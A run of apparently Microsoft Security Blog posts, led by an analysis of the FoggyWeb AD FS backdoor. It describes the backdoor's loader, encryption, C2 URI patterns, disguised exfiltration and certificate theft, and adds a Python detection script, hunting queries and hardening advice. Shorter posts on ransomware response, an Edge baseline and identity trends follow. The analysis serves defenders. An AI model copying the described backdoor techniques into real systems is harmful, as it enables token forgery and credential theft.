The FoggyWeb backdoor (also a managed DLL) is intended to run alongside the legitimate AD FS code (that is, within the same application domain). This means that for the FoggyWeb loader to load the backdoor alongside the AD FS code, it needs to gain access to the same application domain that the AD FS code is executed within. Since the FoggyWeb loader version.dll is an unmanaged application, it cannot directly access the virtual runtime environment that the managed AD FS code is executed within. The loader overcomes this limitation and loads the backdoor alongside the AD FS code by leveraging the CLR hosting interfaces and APIs to access the virtual runtime environment within which the AD FS code is executed.

The loader performs the following high-level actions:

  • Enumerate all CLRs loaded in the AD FS process Microsoft.IdentityServer.ServiceHost.exe
  • For each CLR, enumerate all running application domains and perform the following actions for each domain:
    • Read the contents of the following encrypted FoggyWeb backdoor file into memory: C:\Windows\SystemResources\Windows.Data.TimeZones\pris\Windows.Data.TimeZones.zh-PH.pri
    • Decrypt the encrypted FoggyWeb backdoor file using the Lightweight Encryption Algorithm (LEA). The LEA-128 key schedule uses the following hardcoded master key to generate the round keys:

Screenshot of hardcoded master key to generate the round keys

After decrypting each 16-byte cipher block, the loader uses the following XOR key to decode each individual decrypted/plaintext block:

Screenshot of XOR key to decode each individual decrypted/plaintext block

This is equivalent to first LEA decrypting the entire file and then XOR decoding the decrypted data (instead of decrypting and XOR decoding each individual 16-byte block).

    • Create a Safe Array and copy the decrypted FoggyWeb backdoor bytes to the array. It then calls the Load() function for the current application domain to load the FoggyWeb DLL into the application domain. After the FoggyWeb DLL is loaded into the current application domain, the loader invokes the following method from the DLL: Microsoft.IdentityServer.WebExtension.WebHost.

At this point in the execution cycle, the FoggyWeb DLL is loaded into one or more application domains where the legitimate AD FS code is running. This means the backdoor code runs alongside the AD FS code with the same access and permissions as the AD FS application. Because the backdoor is loaded in the same application domain as the AD FS code, it gains programmatic access to the legitimate classes, methods, properties, fields, objects, and components used by various AD FS modules to carry out their legitimate functionality. Such access allows the FoggyWeb backdoor to directly interact with the AD FS codebase (that is, not as an external disk-resident tool) and selectively invoke native AD FS methods needed to facilitate its malicious operations.

FoggyWeb backdoor

This malicious memory-resident DLL (originally named Microsoft.IdentityServer.WebExtension.dll by its developer) functions as a backdoor targeting AD FS. It is loaded by the main AD FS service process Microsoft.IdentityServer.ServiceHost.exe through a malicious loader component.

When loaded, the backdoor starts an HTTP listener that listens for HTTP GET and POST requests containing the following URI patterns:

  • HTTP GET URI pattern: /adfs/portal/images/theme/light01/
  • HTTP POST URI pattern: /adfs/services/trust/2005/samlmixed/upload

As shown below, the URI patterns are hardcoded in the backdoor and mimic the structure of the legitimate URIs used by the target’s AD FS deployment.

Screenshot of the backdoor’s hardcoded URI patterns, which mimic the structure of the legitimate URIs used by the target’s AD FS deployment.

Once the backdoor receives an HTTP request that contains one of the URI patterns above, the listener proceeds to handle the request using either an HTTP GET or HTTP POST callback/handler method (ProcessGetRequest() and ProcessPostRequest(), respectively).

Screenshot of code showing the listener handling the request using either an HTTP GET or HTTP POST callback/handler method

HTTP GET handler

The incoming HTTP GET requests that contain the URI pattern /adfs/portal/images/theme/light01/ are handled by the backdoor’s ProcessGetRequest() method.

Screenshot of ProcessGetRequest() method

If an incoming HTTP GET request is issued for a file/resource with the file extension of .webp, the ProcessGetRequest() method proceeds to handle the request. Otherwise, the request is ignored by the backdoor. Also, if the requested file name matches one of the three hardcoded names below, the backdoor treats the request as a C2 command issued by the attacker.

Screenshot of code showing hardcoded names

The following URL patterns are treated as C2 commands:

  • /adfs/portal/images/theme/light01/profile.webp
  • /adfs/portal/images/theme/light01/background.webp
  • /adfs/portal/images/theme/light01/logo.webp

The first two C2 commands, profile.webp and background.webp (UrlGetFileNames[0] and UrlGetFileNames[1] in the screenshot above), are handled by calling the backdoor’s Service.GetCertificate() method.

Screenshot of code for Service.GetCertificate() method

As the name suggests, this method is responsible for retrieving an AD FS certificate (either the token-signing or the token encryption certificate, depending on the value of the certificateType parameter passed to the method) from the AD FS service configuration database.

Analyst note: Refer to the Appendix for an in-depth analysis of the Service.GetCertificate() method and how it obtains and decrypts either the token signing or encryption certificate.

As shown in the screenshot above, when the C2 command profile.webp (UrlGetFileNames[0]) is issued to the backdoor (by issuing an HTTP GET request for the URI /adfs/portal/images/theme/light01/profile.webp), the backdoor retrieves the token-signing certificate of the compromised AD FS server. Similarly, when the C2 command background.webp (UrlGetFileNames[1]) is issued to the backdoor (by issuing an HTTP GET request for the URI /adfs/portal/images/theme/light01/background.webp), the backdoor retrieves the token encryption certificate of the compromised AD FS server.

The third C2 command, logo.webp (UrlGetFileNames[2]), is triggered by sending an HTTP GET request to the following URI: /adfs/portal/images/theme/light01/logo.webp. The C2 command is handled by calling the backdoor’s GetInfo() method.

Screenshot of code for the backdoor’s GetInfo() method

The GetInfo() method is responsible for dumping the AD FS service configuration data of the compromised server.

Screenshot of GetInfo() method dumping the AD FS service configuration data

As shown above, the AD FS service configuration data is obtained via the ServiceSettingsData property, which retrieves the data from the AD FS service configuration database, Windows Internal Database (WID).

Before returning the output of the C2 commands (that is, the token-signing certificate, the token encryption certificate, or the AD FS service configuration data) to the C2 in an HTTP 200 response, the backdoor first obfuscates the output by calling its method named GetWebpImage().

Screenshot of code for GetWebpImage() method

The GetWebpImage() method is in charge of masquerading the output of the C2 commands as a legitimate WebP file (by adding appropriate RIFF/WebP file header magic/fields) and encoding the resulting WebP file.

Screenshot of code for GetWebpImage() method masquerading the output of the C2

GetWebpImage() uses the following helper methods to create and encode the fake WebP file that contains the C2 command output:

  • GetWebpImage() first invokes the Webp.GetFrame() method, which is responsible for compressing the output of the C2 command and copying the compressed version to a new array (0 padded to a multiple of 32 bytes). The length of the compressed data is added as the first four bytes of the new array.

To compress the data, GetFrame() invokes the Common.Compress() method, which is used to compress the data by leveraging the C# GZipStream compression class.

For demonstration purposes, assume the C2 command yields the following data (a 256-byte pseudo-randomly generated byte array).

Given the data above (that is, sample C2 command output), GetFrame() returns the following byte array.

  • Next, GetWebpImage() invokes the Webp.GetWebpHeader() method, passing in the size of the byte array returned by GetFrame() in the step above. GetWebpHeader() is responsible for creating and returning an array containing custom RIFF WebP file magic/header bytes.

The array variable above contains the following 32-byte hardcoded RIFF/WebP header bytes.

If the size of the array passed to GetWebpHeader() (returned by GetFrame()) exceeds 8,192 bytes, the bytes at index 26 and 28 of the header bytes (initially set to 0x00) are replaced with 0x80. Otherwise, the bytes at index 26 and 28 are replaced with 0x40, as shown below.

GetWebpHeader() then returns the custom RIFF/WebP header above to GetWebpImage().

  • Next, GetWebpImage() creates a new array by appending the custom RIFF/WebP header bytes returned by GetWebpHeader() to the array returned by GetFrame() (the array containing the compressed version of the C2 command output).


GetWebpImage() calls the Common.ProtectData() method of the backdoor to encode the portion of the new array that contains the compressed bytes (that is, it does not encode the custom RIFF/WebP header). As the second argument, GetWebpImage() passes the offset of the first compressed byte to ProtectData() (as shown in the table above, 0x20 or 32 is the offset of the first compressed byte in this case). ProtectData() uses a dynamic XOR key and a custom XOR methodology to XOR encode the compressed data.


Initially, the 12-byte hardcoded XOR key array contains the following (seed) bytes.

As shown in the screenshot above, each byte of compressed data is XOR’d with a byte from the XOR key array. The first byte of the compressed data (0x17) is XOR’d with the XOR key byte located at offset 8 of the key array (0x77).

After XOR’ing the first byte of the compressed data with the XOR key byte located at offset 8 of the key array, the XOR key byte itself gets overwritten with a new value.

For example, the XOR key byte located at offset 8 of the XOR key array (0x77) gets overwritten with 0xEE via the following operations.

The second byte of the compressed data (0x01) is XOR’d with the XOR key byte located at offset 9 of the key array (33 % 12 = 9) and so on until the key rolls to the first byte of the XOR array (as mentioned above, the XOR key bytes get overwritten after each encoding operation). Below is the XOR encoded version of the sample compressed array.

After the steps outlined above, GetWebpImage() returns the following sample data to the method that invokes it to obfuscate and conceal the output of each C2 command (ProcessGetRequest()).

As previously mentioned, ProcessGetRequest() returns the fake RIFF/WebP file generated above (containing stolen token-signing certificate, token encryption certificate, or the AD FS service configuration data) to the C2 in an HTTP 200 response.

If the backdoor cannot execute a C2 command successfully, it returns an HTTP 404 response to the C2 instead.

HTTP POST handler

Incoming HTTP POST requests that match the URI pattern /adfs/services/trust/2005/samlmixed/upload are handled by the ProcessPostRequest() method.

This method ensures that the ContentType value of an incoming HTTP POST request ends with “xml” (case-insensitive), and that the HTTP POST data contains two XML elements named X509Certificate and SignatureValue (for example, a blob that starts with the string “<X509Certificate>” and ends with the string “</X509Certificate>”).

If the XML data contains the two elements, the backdoor performs the following actions:

  • Decode the values of the SignatureValue and X509Certificate elements by first decoding the values using Base64 and then calling the Common.UprotectData() method on each decoded value.

The UprotectData() method treats the first two bytes of the Base64 decoded value as a two-byte XOR key. It invokes the Common.ProtectData() method (covered in the previous section) on the rest of the data (that is, third byte on) and then uses the two-byte XOR key to XOR decode the data returned by Common.ProtectData(). In other words, UprotectData() leverages Common.ProtectData() to remove the first layer of XOR encoding and then another XOR routine to remove the second layer of XOR encoding applied to the data.

  • Invoke the Service.ExecuteAssembly() method to handle the decoded SignatureValue and X509Certificate values. As shown below, the decoded X509Certificate value is first GZip-decompressed (inflated) by calling the Common.Decompress() method.

In a new thread, Service.ExecuteAssembly() calls Service.ExecuteAssemblyRoutine() method to handle the data.

  • ExecuteAssemblyRoutine() checks if the decoded X509Certificate value starts with “MZ” (or the bytes 0x4D 0x5A, the hexadecimal representation of the decimal numbers 77 and 90, as seen in the screenshot below).

  • If the decoded X509Certificate value starts with “MZ,” the backdoor treats the decoded data as a .NET-based assembly/payload and proceeds to call its Service.ExecuteBinary() method to load and execute the DLL payload in memory. After loading the DLL in memory, ExecuteBinary() proceeds to invoke a specific method from the loaded DLL. The method name and parameters needed to invoke the method are supplied to the backdoor within the decoded SignatureValue data.

If the decoded X509Certificate value does not start with MZ, the backdoor treats the decoded X509Certificate value as source code for a C#-based payload and calls its Service.ExecuteSource() method to dynamically compile and execute the payload in memory.

After handling the HTTP POST request containing the XML elements X509Certificate and SignatureValue, the backdoor responds to the request with an HTTP 204 response code. If the HTTP POST does not have the elements mentioned above, the backdoor responds to the request with an HTTP 404 response code.
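A request-log check for the GET and POST handler behaviour described above, as an added example that is not part of the Microsoft post. The URI prefix, the .webp rule, the three command file names, the upload URI and the “content type ends with xml” rule come from the post; the log line format and sample lines are constructed for this example, and the case-insensitive file-name comparison is an assumption made for detection coverage.

```python
"""Flag HTTP requests that match the FoggyWeb C2 URI patterns.

Added example, not code from the Microsoft blog post. The log line
format used here is constructed: timestamp, client, method, URI,
response status, and the request Content-Type (or "-" when absent).
It stands in for whatever request log a defender has in front of the
AD FS endpoint (reverse proxy, Web Application Proxy, packet capture).
"""
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

GET_PREFIX = "/adfs/portal/images/theme/light01/"
POST_URI = "/adfs/services/trust/2005/samlmixed/upload"

# GET file names the backdoor treats as C2 commands, and what each returns.
C2_GET_COMMANDS = {
    "profile.webp": "token-signing certificate",
    "background.webp": "token-encryption certificate",
    "logo.webp": "AD FS configuration data",
}


def classify_request(method: str, uri: str, content_type: str = "") -> Optional[str]:
    """Return a finding label for one request, or None if it is of no interest."""
    path = urlsplit(uri).path  # drop any query string before matching
    method = method.upper()
    if method == "GET" and path.startswith(GET_PREFIX):
        # Assumption: compare case-insensitively; the post does not state
        # how the backdoor itself compares file names.
        name = path[len(GET_PREFIX):].lower()
        if name in C2_GET_COMMANDS:
            return f"c2-get: {C2_GET_COMMANDS[name]}"
        if name.endswith(".webp"):
            # The backdoor only handles .webp requests under this prefix.
            return "suspicious-get: .webp request under the backdoor GET prefix"
        return None
    if method == "POST" and path == POST_URI:
        if content_type.strip().lower().endswith("xml"):
            return "c2-post: payload upload (XML content type)"
        return "suspicious-post: backdoor upload URI without an XML content type"
    return None


def scan_log(lines: List[str]) -> List[Tuple[int, str, str, str]]:
    """Scan constructed log lines; returns (line_no, client, label, status)."""
    findings = []
    for number, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 6:
            continue  # malformed line, ignore
        _timestamp, client, method, uri, status, content_type = fields[:6]
        if content_type == "-":
            content_type = ""
        label = classify_request(method, uri, content_type)
        if label:
            findings.append((number, client, label, status))
    return findings


# Constructed sample log (RFC 5737 documentation addresses, not real clients).
SAMPLE_LOG = [
    "2021-09-27T10:00:01Z 203.0.113.10 GET /adfs/ls/?wa=wsignin1.0 200 -",
    "2021-09-27T10:00:02Z 203.0.113.10 GET /adfs/portal/images/theme/light01/logo.png 200 -",
    "2021-09-27T10:00:03Z 198.51.100.7 GET /adfs/portal/images/theme/light01/profile.webp 200 -",
    "2021-09-27T10:00:04Z 198.51.100.7 GET /adfs/portal/images/theme/light01/logo.webp 200 -",
    "2021-09-27T10:00:05Z 198.51.100.7 POST /adfs/services/trust/2005/samlmixed/upload 204 application/xml",
    "2021-09-27T10:00:06Z 203.0.113.10 POST /adfs/services/trust/2005/windowsmixed 200 application/soap+xml",
]


if __name__ == "__main__":
    for number, client, label, status in scan_log(SAMPLE_LOG):
        print(f"line {number}: {client} -> {label} (status {status})")
```

Lines 3 to 5 of the sample are flagged (a certificate request, a configuration dump and a payload upload from the same client); the legitimate theme image and the windowsmixed endpoint are not.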

Appendix: Obtaining and decrypting AD FS tokens

As the name suggests, the Service.GetCertificate() method is responsible for retrieving an AD FS certificate (either the token-signing or the token encryption certificate, depending on the value of the certificateType parameter passed to the method) from the AD FS service configuration database.

The method performs the following actions to retrieve the desired certificate:

  • Invoke another one of its methods named GetServiceSettingsDataProvider() to create an instance of type Microsoft.IdentityServer.PolicyModel.Configuration.ServiceSettingsDataProvider from the already loaded assembly Microsoft.IdentityServer.

  • Invoke the GetServiceSettings() member/method of the above ServiceSettingsDataProvider instance to obtain the AD FS service configuration settings.

  • Obtain the value of the AD FS service settings (from the SecurityTokenService property), extract the value of the EncryptedPfx blob from the service settings, and decode the blob using Base64.

  • Invoke another method named GetAssemblyByName() to enumerate all loaded assemblies by name and locate the already loaded assembly Microsoft.IdentityServer.Service. This method retrieves the value of two fields named _state and _certificateProtector from an object of type Microsoft.IdentityServer.Service.Configuration.AdministrationServiceState (from the Microsoft.IdentityServer.Service assembly).

The AdministrationServiceState class/object contains configuration information necessary for the execution and handling of client requests. The field _state is used to maintain the current state of the AdministrationServiceState class/object (screenshot from Microsoft.IdentityServer.Service.dll).

The AdministrationServiceState object (stored in the _state field) contains another field named _certificateProtector.

The field _certificateProtector stores an instance of the Data Protector class DkmDataProtector for Distributed Key Management (DKM). The DkmDataProtector class implements a method named Unprotect(), which ultimately calls the Unprotect() method of DKM/IDKM (screenshot from Microsoft.IdentityServer.dll).

The DKM Unprotect() method inherits a method named Unprotect() from Microsoft.IdentityServer.Dkm.DKMBase (screenshot from Microsoft.IdentityServer.Dkm.dll).

The Unprotect() method from Microsoft.IdentityServer.Dkm.DKMBase (shown above) provides the functionality to decrypt the encrypted certificate (a PKCS12 object) stored in the EncryptedPfx blob.

Armed with the knowledge about the availability of the Unprotect() method accessible via the _certificateProtector field, the backdoor invokes the Unprotect() method to decrypt the encrypted certificate stored in the EncryptedPfx blob of the desired certificate type (either the AD FS token signing or encryption certificate).

A variant of the technique described in this Appendix was publicly presented by Douglas Bienstock and Austin Baker at the TROOPERS conference in 2019 (I am AD FS and so can you: Attacking Active Directory Federated Services). However, the method used by FoggyWeb differs from the publicly presented method, in that FoggyWeb leverages the _state and _certificateProtector fields from the AdministrationServiceState class/object to facilitate access to the Data Protector class DkmDataProtector (used to gain access to and invoke the Unprotect() method).

Indicators of compromise (IOCs)



Customers should review their AD FS server configuration and implement changes to secure these systems from attacks.

We strongly recommend that organizations harden and secure AD FS deployments through the following best practices:

  • Ensure only Active Directory Admins and AD FS Admins have admin rights to the AD FS system.
  • Reduce local Administrators’ group membership on all AD FS servers.
  • Require all cloud admins to use multi-factor authentication (MFA).
  • Ensure minimal administration capability via agents.
  • Limit on-network access via host firewall.
  • Ensure AD FS Admins use Admin Workstations to protect their credentials.
  • Place AD FS server computer objects in a top-level OU that doesn’t also host other servers.
  • Ensure that all GPOs that apply to AD FS servers apply only to them and not to any other servers. This limits potential privilege escalation through GPO modification.
  • Ensure that the installed certificates are protected against theft. Don’t store these on a share on the network, and set a calendar reminder to ensure they get renewed before expiring (an expired certificate breaks federation authentication). Additionally, we recommend protecting signing keys or certificates in a hardware security module (HSM) attached to AD FS.
  • Set logging to the highest level and send the AD FS (and security) logs to a SIEM to correlate with AD authentication as well as Azure AD (or similar).
  • Remove unnecessary protocols and Windows features.
  • Use a long (>25 characters) and complex password for the AD FS service account. We recommend using a Group Managed Service Account (gMSA) as the service account, as it removes the need for managing the service account password over time by managing it automatically.
  • Update to the latest AD FS version for security and logging improvements (as always, test first).
  • When federated with Azure AD, follow the best practices for securing and monitoring the AD FS trust with Azure AD.


Protecting AD FS servers is key to mitigating NOBELIUM attacks. Detecting and blocking malware, attacker activity, and other malicious artifacts on AD FS servers can break critical steps in known NOBELIUM attack chains. Microsoft Defender Antivirus detects the new NOBELIUM components discussed in this blog as the following malware:

  • Loader: Trojan:Win32/FoggyWeb.A!dha
  • Backdoor: Trojan:MSIL/FoggyWeb.A!dha

Microsoft 365 Defender

Endpoint detection and response (EDR) capabilities in Microsoft Defender for Endpoint detect malicious behavior related to this malware, which is surfaced as alerts with the following titles:

  • A suspicious DLL was loaded by the ADFS service
  • Suspicious service launched
  • Suspicious file dropped

Azure AD Identity Protection

This kind of attack can also be detected in the cloud using Azure AD Identity Protection. It is recommended that you monitor the Azure AD Identity Protection Risk detections report for the “Token Issuer Anomaly” detection. This detection looks for anomalies in the SAML token presented to the Azure AD tenant.

Advanced hunting queries

Microsoft Defender for Endpoint

To locate related activity, run the following advanced hunting queries in Microsoft 365 Defender:

| where FolderPath has @"C:\Windows\ADFS"
| where FileName has @"version.dll"

Azure Sentinel

Azure Sentinel customers can use the following detection queries to look for this activity:

Detection query:

Indicator file:


The post FoggyWeb: Targeted NOBELIUM malware leads to persistent backdoor appeared first on Microsoft Security Blog.


A guide to combatting human-operated ransomware: Part 2

September 27th, 2021 No comments

This blog is part two of a two-part series focused on how Microsoft DART helps customers with human-operated ransomware. For more guidance on human-operated ransomware and how to defend against these extortion-based attacks, refer to our human-operated ransomware docs page.

In part one of this blog series, we described the process and execution used in our customer engagements to provide perspective on the unique issues and challenges regarding human-operated ransomware. We also explained how Microsoft’s Detection and Response Team (DART) leverages Microsoft solutions to help combat this threat. In this post, we will tackle the risks of human-operated ransomware and detail DART’s security recommendations for tactical containment actions and post-incident activities in the event of an attack.

Understanding the risks of human-operated ransomware

Beyond the immediate threat of file encryption, there are several additional risks associated with human-operated ransomware events, some of which may be observed well after an investigation and the removal of the threat from the network. These risks include:

1. Disruption of business operations

Immediate actions need to be taken to reduce the blast radius of a ransomware event. In these cases, disabling portions of the network may feel like a self-inflicted denial of service, but it is necessary to counter the spread of the ransomware. The resulting business disruption may become public. If any affected systems are public-facing, it may require crisis communications.

2. Data theft

Most attackers are highly motivated to monetize their access to your network. In several cases investigated by DART, an attacker has performed reconnaissance for sensitive files (like contracts, financial documents, and internal communications), copied this data, and exfiltrated it before any ransomware was dropped. Taking this information before ransomware is deployed allows the attacker to have data to sell, leak, or simply show as proof that the attacker has had access to sensitive files.

3. Extortion

Data theft by ransomware operators opens an organization to extortion. It is not uncommon for threat actors to demand payment to prevent the leak of stolen data. These threats are typically sent via email with sample stolen documents attached as proof of possession. In some cases where DART has observed this activity, a threat actor accessed a cloud-based email account that was not protected by multifactor authentication (MFA) and sent threatening emails to the board of directors. The threat of extortion is still high, even when the threat actors are unsuccessful at deploying ransomware.

At DART, we often get asked, “Can you tell us which data was stolen?” To prove this requires concrete evidence, which would be either:

  • A network capture that shows the actual data leaving the network (which rarely exists).
  • Finding the data outside the organization’s network, typically on a public file-sharing site.

A log file showing ‘x’ bytes were transferred does not prove what data was stolen, and a command line history or event log showing a file archiving utility was run does not prove that data was stolen.

4. Follow-on attacks

To further their monetization efforts, attackers are also often observed deploying coin miners in compromised networks. This is a low-effort method to generate additional income from a victim organization when data theft or extortion are insufficient for the attacker. Depending on the attacker’s motivation, additional malware may be deployed that would allow other criminals to gain access to the environment. This access is monetized, and the sale of compromised network access is common in most human-operated ransomware cases, performed after the primary attacker has obtained what they initially sought.

5. Reputational damage

The risk of brand reputation damage is difficult to assess in the aftermath of a human-operated ransomware event. Damage to an organization’s brand may include lost customer and shareholder trust and loyalty, as well as lost current and future business. Reputational damage may be more costly and require longer-term solutions than the response to the human-operated ransomware event itself.

6. Compliance and regulatory reporting

Potential reporting requirements are another organizational risk depending on the industry or affiliation. This may include compliance or regulatory reporting in cases where sensitive financial information or personally identifiable information (PII) is stolen. Fines and loss of accreditation may further damage an organization’s reputation.

Recommendations and best practices


Containment can only happen once we determine what needs to be contained. In the case of ransomware, the adversary’s goal is to obtain credentials that allow administrative control over a highly available server and then deploy the ransomware. In some cases, the threat actor identifies sensitive data and exfiltrates it to a location they control.

Tactical recovery will be unique for each customer and tailored to the customer’s environment, industry, and level of IT expertise and experience. The steps outlined below are recommended for short-term and tactical containment steps your organization can take. To learn more about securing privileged access for long-term guidance, visit our securing privileged access docs page. For a comprehensive view of ransomware and extortion and how to protect your organization, you can refer to our human-operated ransomware docs page.

Graphic outlines DART’s containment steps, which cover assessing the scope of the situation and preserving existing systems.

Figure 1. Containment steps that can be done concurrently as new vectors are discovered.

After the first step of containment (assessing the scope of the situation), the second step is to preserve existing systems:

  • Disable all privileged user accounts except for a few accounts used by your admins to assist in resetting the integrity of your Microsoft Azure Active Directory (Azure AD) infrastructure. If a user account is believed to be compromised, disable it immediately.
  • Isolate compromised systems from the network, but do not shut them off.
  • Isolate at least one known good domain controller in every domain—two is even better. Either disconnect them from the network or shut them down entirely. The object here is to stop the spread of ransomware to critical systems—identity being among the most vulnerable. If all your domain controllers are virtual, ensure that the virtualization platform’s system and data drives are backed up to offline external media (not connected to the network) in case the virtualization platform itself is compromised.
  • Isolate critical known good application servers (for example SAP, configuration management database (CMDB), billing, and accounting systems).

These two steps can be done concurrently as new vectors are discovered. Disable those vectors and then try to find a known good system to isolate from the network.

Other tactical containment actions can be accomplished:

  • Reset the krbtgt password, twice in rapid succession. Consider using a scripted, repeatable process. This script enables you to reset the krbtgt account password and related keys while minimizing the likelihood of Kerberos authentication issues being caused by the operation. To minimize potential issues, the krbtgt lifetime can be reduced one or more times prior to the first password reset so that the two resets are done relatively quickly. NOTE: All domain controllers that you plan to keep in your environment must be online.
  • Deploy a Group Policy to the entire domain(s) that prevents privileged log on (Domain Admins) to anything but Domain Controllers and privileged administrative-only workstations (if any).
  • Install all missing security updates for operating systems and applications. Every missing update is a potential threat vector that adversaries can quickly identify and exploit. Microsoft Defender for Endpoint’s Threat and Vulnerability Management provides an easy way to see exactly what is missing—as well as the potential impact of the missing updates.
  • Check that every external facing application, including VPN access, is protected by multifactor authentication, preferably using an authentication application that is running on a secured device.
  • For devices not using Defender for Endpoint as their primary antivirus software, run a full scan with Microsoft Safety Scanner on isolated “known good” systems before reconnecting them to the network.
  • For any legacy operating systems, upgrade to a supported OS or decommission these devices. If neither option is available, take every possible measure to isolate these devices, including network/VLAN isolation, IPsec rules, and logon restrictions, so that they are accessible only to the applications, users, and devices needed for business continuity.

DART sometimes finds customers who are running mission critical systems on legacy operating systems (some as old as Windows NT 4) and applications, all on legacy hardware. This is one of the riskiest configurations possible—not only are these operating systems and applications insecure, if that hardware fails, backups typically cannot be restored on modern hardware. Unless replacement legacy hardware is available, these applications will cease to function.

Post-incident activities

DART recommends implementing the following security recommendations and best practices after each incident.

  • Ensure that best practices are in place for email and collaboration solutions to make it more difficult for attackers to abuse them while allowing internal users to access external content easily and safely.
  • Follow Zero Trust security best practices for remote access solutions to internal organizational resources.
  • Starting with critical impact administrators, follow best practices for account security including using passwordless or MFA.
  • Implement a comprehensive strategy to reduce the risk of privileged access compromise.
    • For cloud and forest/domain administrative access, see below for an overview of Microsoft’s privileged access model (PAM).
    • For endpoint administrative management, see below for details on the local administrative password solution (LAPS).
  • Implement data protection to block ransomware techniques and to confirm rapid and reliable recovery from an attack.
  • Review your critical systems. Check for protection and backups against deliberate attacker erasure/encryption. It’s important that these backups are periodically tested and validated.
  • Ensure rapid detection and remediation of common attacks on endpoint, email, and identity.
  • Actively discover and continuously improve the security posture of your environment.
  • Update organizational processes to manage major ransomware events and streamline outsourcing to avoid friction.

Privileged access model (PAM)

Using the privileged access model (formerly known as the tiered administration model) enhances Azure AD’s security posture. This involves:

  • Breaking out administrative accounts into a Plane-based environment—one account for each level, usually four:
    • Control Plane (formerly Tier 0): Administration of Domain Controllers and other crucial identity services (like Active Directory Federation Service (ADFS) or Azure AD Connect). This also includes applications that require administrative permissions to Azure AD, such as Exchange Server.
    • The next two Planes were formerly Tier 1:
      • Management Plane: Asset management, monitoring, and security.
      • Data/Workload Plane: Applications and application servers.
    • The next two Planes were formerly Tier 2:
      • User Access: Access rights for users (such as accounts).
      • App Access: Access rights for applications.
  • Each Plane has its own separate administrative workstation, which only has access to systems in that Plane. Accounts from other Planes are denied access to the workstations and servers in a Plane through user rights assignments set on those machines.
  • The net result of the PAM is that:
    • A compromised user account will only have access to the Plane it is a part of.
    • More sensitive user accounts will not be logging into workstations and servers with a lower Plane’s security level, thereby reducing lateral movement.

Local Administrative Password Solution (LAPS)

By default, Microsoft Windows and Azure AD have no centralized management of local administrative accounts on workstations and member servers. This usually results in a common password that is given for all these local accounts, or at the very least in groups of machines. This enables would-be attackers to compromise one local administrator account, and then use that account to gain access to other workstations or servers in the organization.

Microsoft’s Local Administrator Password Solution (LAPS) mitigates this by using a Group Policy client-side extension that changes the local administrative password at regular intervals on workstations and servers according to the policy set. Each of these passwords is different and is stored as an attribute in the Azure AD computer object. This attribute can be retrieved from a simple client application, depending on the permissions assigned to that attribute.

LAPS requires the Azure AD schema to be extended to allow for the additional attribute, the LAPS Group Policy templates to be installed, and a small client-side extension to be installed on every workstation and member server to provide the client-side functionality.

Download LAPS from the official Microsoft Download Center.

Harden your environment

Each ransomware case is different and there is no one-size-fits-all approach. But there are things you can do now to harden your environment and prepare for a worst-case scenario. Although these changes may impact how your organization currently works, weigh the risk of not implementing them now against dealing with a potential human-operated ransomware event. An organization that has fallen victim to a ransomware attack should keep the crucial human element in mind—real people are responding to the incident at the end of the day.

Learn more

Want to learn more about DART? Read our past blog posts.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post A guide to combatting human-operated ransomware: Part 2 appeared first on Microsoft Security Blog.

Security baseline for Microsoft Edge v94

September 27th, 2021

We are pleased to announce the enterprise-ready release of the security baseline for Microsoft Edge version 94!

We have reviewed the new settings in Microsoft Edge version 94 and determined that there are no additional security settings that require enforcement. The Microsoft Edge version 93 package continues to be our recommended baseline. That baseline package can be downloaded from the Microsoft Security Compliance Toolkit.

Microsoft Edge version 94 introduced 3 new computer settings and 3 new user settings. We have attached a spreadsheet listing the new settings to make it easier for you to find them.

In case you missed the announcement, Microsoft Edge has moved to a new release cadence. Additional details can be found in this blog.

As a reminder, all available settings for Microsoft Edge are documented here, and all available settings for Microsoft Edge Update are documented here.

Please continue to give us feedback through the Security Baselines Discussion site or this post.


3 trends shaping identity as the center of modern security

September 21st, 2021

I recently returned from Kenya, where I visited our Microsoft Nairobi development center. Like many of you, I’ve mostly worked from home for the past year and more, so it was refreshing to meet members of our global team and inspiring to feel their passion for our mission: delivering identity solutions that secure access to everything for everyone.

This mission has never been more important, given that identity has become the focal point of our digital society. Identity enabled us to rapidly shift to remote models when the pandemic first hit, and identity will help sustain the trend toward more permanent remote and hybrid models moving forward. But other emerging trends will also have a major impact on our digital society. Our team at Microsoft, as well as the identity community at large, is working hard to make sure you have the tools and technologies you need to navigate them safely and securely.

1. Cybercrime has become cyberwarfare

The sophistication and pervasiveness of cyberattacks have culminated in a moment of reckoning for our industry. Attacks from nation-states and global syndicates are on the rise, putting our economies and our very lives at risk as they target critical infrastructure. These attacks are methodically organized and exploit multiple vulnerabilities to gain access to trusted technologies and valuable data.

A Zero Trust security approach with identity as its foundation is the only way to survive this onslaught. Many of you have already started adopting Zero Trust principles, but blocking advanced, ever-evolving attack vectors requires applying these principles across your entire digital estate. It’s on the security ecosystem, including the identity community, to ensure that our services share signals and interoperate well with your entire infrastructure to enable an end-to-end Zero Trust strategy, with identity as a cohesive security control plane.

2. Multi-cloud is the new normal

As the cyber battle has escalated, so too has the complexity of your infrastructure. On-premises has given way to hybrid, then cloud-first, and now multi-cloud as a new normal. Cloud-based tools have enabled unprecedented automation and scale, as well as the exponential growth of non-human identities—but not without risk. A one-line automated script can topple your infrastructure in milliseconds. Machine objects and scripts can now elevate access privileges to complete administrative tasks, but if compromised, they can be misused.

Since each non-human entity has its own identity, access management becomes a key factor for protecting complex multi-cloud environments. We need services that ensure automation is trustworthy, easily managed, and fully visible so we can assess and control risk. To meet this challenge, the discipline of Cloud Infrastructure Entitlement Management (CIEM) has emerged to help manage the lifecycle and governance of multi-cloud environments. Microsoft has embraced this new category by acquiring CloudKnox.

3. Ubiquitous, decentralized computing requires a new trust fabric

As identity steps up to solve new challenges in an evolving security landscape, the core model for identity itself will become decentralized. This shift is part of a larger evolution to ubiquitous decentralized computing, where datacenters serve as the intelligent cloud facilitating interaction with smart devices and services on the intelligent edge. A decentralized identity model is the only way to achieve the speed required to authorize so many services and things at scale.

The independent nature of a decentralized model makes identity portable. When individuals can take their identities (and the personal information attached to them) with them wherever they conduct digital transactions, they gain more control over their privacy while benefiting from faster and more trustworthy transactions. This will change the world for so many industries, including finance, retail, healthcare, and others. Just a few years into this journey, proofs of concept have already accelerated demand for more convenient, secure, and private ways to interact at work, at home, and at play.

Looking forward

